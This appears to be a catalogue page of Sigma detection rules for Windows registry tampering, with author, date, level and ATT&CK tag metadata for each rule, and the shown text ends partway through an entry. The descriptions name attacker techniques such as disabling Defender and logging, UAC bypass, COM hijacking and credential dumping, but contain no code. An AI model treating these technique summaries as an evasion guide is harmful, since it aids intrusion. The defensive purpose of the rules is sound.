Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)

Internal MISP references

UUID 9d3436ef-9476-4c43-acca-90ce06bdf33a which can be used as unique global reference for DHCP Callout DLL Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dimitrios Slamaris
creation_date 2017-05-15
falsepositive ['Unknown']
filename registry_set_dhcp_calloutdll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Outlook Today Page

Detects potential persistence activity via outlook today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".

Internal MISP references

UUID 487bb375-12ef-41f6-baae-c6a1572b4dd1 which can be used as unique global reference for Potential Persistence Via Outlook Today Page in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
creation_date 2021-06-10
falsepositive ['Unknown']
filename registry_set_persistence_outlook_todaypage.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.t1112']
Related clusters

To see the related clusters, click here.

New Application in AppCompat

A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.

Internal MISP references

UUID 60936b49-fca0-4f32-993d-7415edcf9a5d which can be used as unique global reference for New Application in AppCompat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020-05-02
falsepositive ['This rule is to explore new applications on an endpoint. False positives depends on the organization.', 'Newly setup system.', 'Legitimate installation of new application.']
filename registry_set_new_application_appcompat.yml
level informational
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

New BgInfo.EXE Custom DB Path Registry Configuration

Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.

Internal MISP references

UUID 53330955-dc52-487f-a3a2-da24dcff99b5 which can be used as unique global reference for New BgInfo.EXE Custom DB Path Registry Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-16
falsepositive ['Legitimate use of external DB to save the results']
filename registry_set_bginfo_custom_db.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disabled Windows Defender Eventlog

Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections

Internal MISP references

UUID fcddca7c-b9c0-4ddf-98da-e1e2d18b0157 which can be used as unique global reference for Disabled Windows Defender Eventlog in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-07-04
falsepositive ['Other Antivirus software installations could cause Windows to disable that eventlog (unknown)']
filename registry_set_disabled_microsoft_defender_eventlog.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Disable Tamper Protection on Windows Defender

Detects disabling Windows Defender Tamper Protection

Internal MISP references

UUID 93d298a1-d28f-47f1-a468-d971e7796679 which can be used as unique global reference for Disable Tamper Protection on Windows Defender in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-08-04
falsepositive ['Unknown']
filename registry_set_disabled_tamper_protection_on_microsoft_defender.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Attempt Using New NetworkProvider - REG

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

Internal MISP references

UUID 0442defa-b4a2-41c9-ae2c-ea7042fc4701 which can be used as unique global reference for Potential Credential Dumping Attempt Using New NetworkProvider - REG in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-23
falsepositive ['Other legitimate network providers used and not filtred in this rule']
filename registry_set_new_network_provider.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.credential-access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Potential Persistence Via AppCompat RegisterAppRestart Layer

Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.

Internal MISP references

UUID b86852fb-4c77-48f9-8519-eb1b2c308b59 which can be used as unique global reference for Potential Persistence Via AppCompat RegisterAppRestart Layer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-01-01
falsepositive ['Legitimate applications making use of this feature for compatibility reasons']
filename registry_set_persistence_app_cpmpat_layer_registerapprestart.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Internet Explorer Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID a80f662f-022f-4429-9b8c-b1a41aaa6688 which can be used as unique global reference for Internet Explorer Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_internet_explorer.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Change User Account Associated with the FAX Service

Detect change of the user account associated with the FAX service to avoid the escalation problem.

Internal MISP references

UUID e3fdf743-f05b-4051-990a-b66919be1743 which can be used as unique global reference for Change User Account Associated with the FAX Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-07-17
falsepositive ['Unknown']
filename registry_set_fax_change_service_user.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable PUA Protection on Windows Defender

Detects disabling Windows Defender PUA protection

Internal MISP references

UUID 8ffc5407-52e3-478f-9596-0a7371eafe13 which can be used as unique global reference for Disable PUA Protection on Windows Defender in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-08-04
falsepositive ['Unknown']
filename registry_set_disabled_pua_protection_on_microsoft_defender.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential PSFactoryBuffer COM Hijacking

Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.

Internal MISP references

UUID 243380fa-11eb-4141-af92-e14925e77c1b which can be used as unique global reference for Potential PSFactoryBuffer COM Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
creation_date 2023-06-07
falsepositive ['Unknown']
filename registry_set_persistence_comhijack_psfactorybuffer.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Suspicious Path In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

Internal MISP references

UUID 9d8f9bb8-01af-4e15-a3a2-349071530530 which can be used as unique global reference for Suspicious Path In Keyboard Layout IME File Registry Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023-11-21
falsepositive ['Unknown']
filename registry_set_ime_suspicious_paths.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via DLLPathOverride

Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process

Internal MISP references

UUID a1b1fd53-9c4a-444c-bae0-34a330fc7aa8 which can be used as unique global reference for Potential Persistence Via DLLPathOverride in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Unknown']
filename registry_set_persistence_natural_language.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Scheduled TaskCache Change by Uncommon Program

Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious

Internal MISP references

UUID 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d which can be used as unique global reference for Scheduled TaskCache Change by Uncommon Program in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Syed Hasan (@syedhasan009)
creation_date 2021-06-18
falsepositive ['Unknown']
filename registry_set_taskcache_entry.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Shim Database Modification

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time

Internal MISP references

UUID dfb5b4e8-91d0-4291-b40a-e3b0d3942c45 which can be used as unique global reference for Potential Persistence Via Shim Database Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-30
falsepositive ['Legitimate custom SHIM installations will also trigger this rule']
filename registry_set_persistence_shim_database.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Potential Ransomware Activity Using LegalNotice Message

Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages

Internal MISP references

UUID 8b9606c9-28be-4a38-b146-0e313cc232c1 which can be used as unique global reference for Potential Ransomware Activity Using LegalNotice Message in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-12-11
falsepositive ['Unknown']
filename registry_set_legalnotice_susp_message.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.impact', 'attack.t1491.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Netsh Helper DLL - Registry

Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

Internal MISP references

UUID c90362e0-2df3-4e61-94fe-b37615814cb1 which can be used as unique global reference for Potential Persistence Via Netsh Helper DLL - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Anish Bogati
creation_date 2023-11-28
falsepositive ['Legitimate helper added by different programs and the OS']
filename registry_set_netsh_helper_dll_potential_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.007']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell In Registry Run Keys

Detects potential PowerShell commands or code within registry run keys

Internal MISP references

UUID 8d85cf08-bf97-4260-ba49-986a2a65129c which can be used as unique global reference for Suspicious PowerShell In Registry Run Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022-03-17
falsepositive ['Legitimate admin or third party scripts. Baseline according to your environment']
filename registry_set_powershell_in_run_keys.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

COM Object Hijacking Via Modification Of Default System CLSID Default Value

Detects potential COM object hijacking via modification of default system CLSID.

Internal MISP references

UUID 790317c0-0a36-4a6a-a105-6e576bf99a14 which can be used as unique global reference for COM Object Hijacking Via Modification Of Default System CLSID Default Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-07-16
falsepositive ['Unlikely']
filename registry_set_persistence_com_hijacking_builtin.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Change Winevt Channel Access Permission Via Registry

Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.

Internal MISP references

UUID 7d9263bd-dc47-4a58-bc92-5474abab390c which can be used as unique global reference for Change Winevt Channel Access Permission Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-09-17
falsepositive ['Unknown']
filename registry_set_change_winevt_channelaccess.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Outlook Macro Execution Without Warning Setting Enabled

Detects the modification of Outlook security setting to allow unprompted execution of macros.

Internal MISP references

UUID e3b50fa5-3c3f-444e-937b-0a99d33731cd which can be used as unique global reference for Outlook Macro Execution Without Warning Setting Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ScoubiMtl
creation_date 2021-04-05
falsepositive ['Unlikely']
filename registry_set_office_outlook_enable_macro_execution.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.command-and-control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse

Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.

Internal MISP references

UUID 4fee3d51-8069-4a4c-a0f7-924fcaff2c70 which can be used as unique global reference for FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alfie Champion (delivr.to)
creation_date 2025-07-05
falsepositive ['Unknown']
filename registry_set_filefix_typedpath_commands.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1204.004']
Related clusters

To see the related clusters, click here.

Enable LM Hash Storage

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

Internal MISP references

UUID c420410f-c2d8-4010-856b-dffe21866437 which can be used as unique global reference for Enable LM Hash Storage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-12-15
falsepositive ['Unknown']
filename registry_set_system_lsa_nolmhash.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Office Macros Warning Disabled

Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.

Internal MISP references

UUID 91239011-fe3c-4b54-9f24-15c86bb65913 which can be used as unique global reference for Office Macros Warning Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020-05-22
falsepositive ['Unlikely']
filename registry_set_office_vba_warnings_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Bypass UAC Using DelegateExecute

Bypasses User Account Control using a fileless method

Internal MISP references

UUID 46dd5308-4572-4d12-aa43-8938f0184d4f which can be used as unique global reference for Bypass UAC Using DelegateExecute in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-05
falsepositive ['Unknown']
filename registry_set_bypass_uac_using_delegateexecute.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting

Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module

Internal MISP references

UUID 396ae3eb-4174-4b9b-880e-dc0364d78a19 which can be used as unique global reference for Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-04-05
falsepositive ['Unknown']
filename registry_set_office_outlook_enable_load_macro_provider_on_boot.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.command-and-control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Disable Exploit Guard Network Protection on Windows Defender

Detects disabling Windows Defender Exploit Guard Network Protection

Internal MISP references

UUID bf9e1387-b040-4393-9851-1598f8ecfae9 which can be used as unique global reference for Disable Exploit Guard Network Protection on Windows Defender in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021-08-04
falsepositive ['Unknown']
filename registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Change the Fax Dll

Detect possible persistence using Fax DLL load when service restart

Internal MISP references

UUID 9e3357ba-09d4-4fbd-a7c5-ad6386314513 which can be used as unique global reference for Change the Fax Dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-07-17
falsepositive ['Unknown']
filename registry_set_fax_dll_persistance.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Internet Explorer DisableFirstRunCustomize Enabled

Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.

Internal MISP references

UUID ab567429-1dfb-4674-b6d2-979fd2f9d125 which can be used as unique global reference for Internet Explorer DisableFirstRunCustomize Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-16
falsepositive ['As this is controlled by group policy as well as user settings. Some false positives may occur.']
filename registry_set_internet_explorer_disable_first_run_customize.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Old TLS1.0/TLS1.1 Protocol Version Enabled

Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.

Internal MISP references

UUID 439957a7-ad86-4a8f-9705-a28131c6821b which can be used as unique global reference for Old TLS1.0/TLS1.1 Protocol Version Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-09-05
falsepositive ['Legitimate enabling of the old tls versions due to incompatibility']
filename registry_set_tls_protocol_old_version_enabled.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Register New IFiltre For Persistence

Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.

Internal MISP references

UUID b23818c7-e575-4d13-8012-332075ec0a2b which can be used as unique global reference for Register New IFiltre For Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Legitimate registration of IFilters by the OS or software']
filename registry_set_persistence_ifilter.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

Internal MISP references

UUID 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 which can be used as unique global reference for IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)
creation_date 2023-09-05
falsepositive ['Unknown']
filename registry_set_ie_security_zone_protocol_defaults_downgrade.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Suspicious Service Installed

Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)

Internal MISP references

UUID f2485272-a156-4773-82d7-1d178bc4905b which can be used as unique global reference for Suspicious Service Installed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow (@xknow_infosec), xorxes (@xor_xes)
creation_date 2019-04-08
falsepositive ["Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it."]
filename registry_set_susp_service_installed.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.t1562.001', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

PowerShell Logging Disabled Via Registry Key Tampering

Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging

Internal MISP references

UUID fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 which can be used as unique global reference for PowerShell Logging Disabled Via Registry Key Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-04-02
falsepositive ['Unknown']
filename registry_set_powershell_logging_disabled.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Event Viewer Events.asp

Detects potential registry persistence technique using the Event Viewer "Events.asp" technique

Internal MISP references

UUID a1e11042-a74a-46e6-b07c-c4ce8ecc239b which can be used as unique global reference for Potential Persistence Via Event Viewer Events.asp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-17
falsepositive ['Unknown']
filename registry_set_persistence_event_viewer_events_asp.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Periodic Backup For System Registry Hives Enabled

Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups. Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".

Internal MISP references

UUID 973ef012-8f1a-4c40-93b4-7e659a5cd17f which can be used as unique global reference for Periodic Backup For System Registry Hives Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-07-01
falsepositive ['Legitimate need for RegBack feature by administrators.']
filename registry_set_enable_periodic_backup.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Scrobj.dll COM Hijacking

Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute

Internal MISP references

UUID fe20dda1-6f37-4379-bbe0-a98d400cae90 which can be used as unique global reference for Potential Persistence Via Scrobj.dll COM Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-20
falsepositive ['Legitimate use of the dll.']
filename registry_set_persistence_scrobj_dll.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Running Chrome VPN Extensions via the Registry 2 VPN Extension

Running Chrome VPN Extensions via the Registry install 2 vpn extension

Internal MISP references

UUID b64a026b-8deb-4c1d-92fd-98893209dff1 which can be used as unique global reference for Running Chrome VPN Extensions via the Registry 2 VPN Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-28
falsepositive ['Unknown']
filename registry_set_chrome_extension.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.initial-access', 'attack.persistence', 'attack.t1133']
Related clusters

To see the related clusters, click here.

New File Association Using Exefile

Detects the abuse of the exefile handler in new file association. Used for bypass of security products.

Internal MISP references

UUID 44a22d59-b175-4f13-8c16-cbaef5b581ff which can be used as unique global reference for New File Association Using Exefile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021-11-19
falsepositive ['Unknown']
filename registry_set_file_association_exefile.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Potential EventLog File Location Tampering

Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting

Internal MISP references

UUID 0cb8d736-995d-4ce7-a31e-1e8d452a1459 which can be used as unique global reference for Potential EventLog File Location Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author D3F7A5105
creation_date 2023-01-02
falsepositive ['Unknown']
filename registry_set_evtx_file_key_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

UAC Bypass via Event Viewer

Detects UAC bypass method using Windows event viewer

Internal MISP references

UUID 7c81fec3-1c1d-43b0-996a-46753041b1b6 which can be used as unique global reference for UAC Bypass via Event Viewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017-03-19
falsepositive ['Unknown']
filename registry_set_uac_bypass_eventvwr.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

ETW Logging Disabled In .NET Processes - Sysmon Registry

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

Internal MISP references

UUID bf4fc428-dcc3-4bbd-99fe-2422aeee2544 which can be used as unique global reference for ETW Logging Disabled In .NET Processes - Sysmon Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020-06-05
falsepositive ['Unknown']
filename registry_set_dot_net_etw_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Excel Add-in - Registry

Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.

Internal MISP references

UUID 961e33d1-4f86-4fcf-80ab-930a708b2f82 which can be used as unique global reference for Potential Persistence Via Excel Add-in - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023-01-15
falsepositive ['Unknown']
filename registry_set_persistence_xll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137.006']
Related clusters

To see the related clusters, click here.

Potential Persistence Via MyComputer Registry Keys

Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)

Internal MISP references

UUID 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06 which can be used as unique global reference for Potential Persistence Via MyComputer Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-09
falsepositive ['Unlikely but if you experience FPs add specific processes and locations you would like to monitor for']
filename registry_set_persistence_mycomputer.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Suspicious Space Characters in RunMRU Registry Path - ClickFix

Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.

Internal MISP references

UUID 7a1b4c5e-8f3d-4b9a-7c2e-1f4a5b8c6d9e which can be used as unique global reference for Suspicious Space Characters in RunMRU Registry Path - ClickFix in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-11-04
falsepositive ['Unlikely']
filename registry_set_susp_runmru_space_character.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1204.004', 'attack.defense-evasion', 'attack.t1027.010']
Related clusters

To see the related clusters, click here.

New Root or CA or AuthRoot Certificate to Store

Detects the addition of new root, CA or AuthRoot certificates to the Windows registry

Internal MISP references

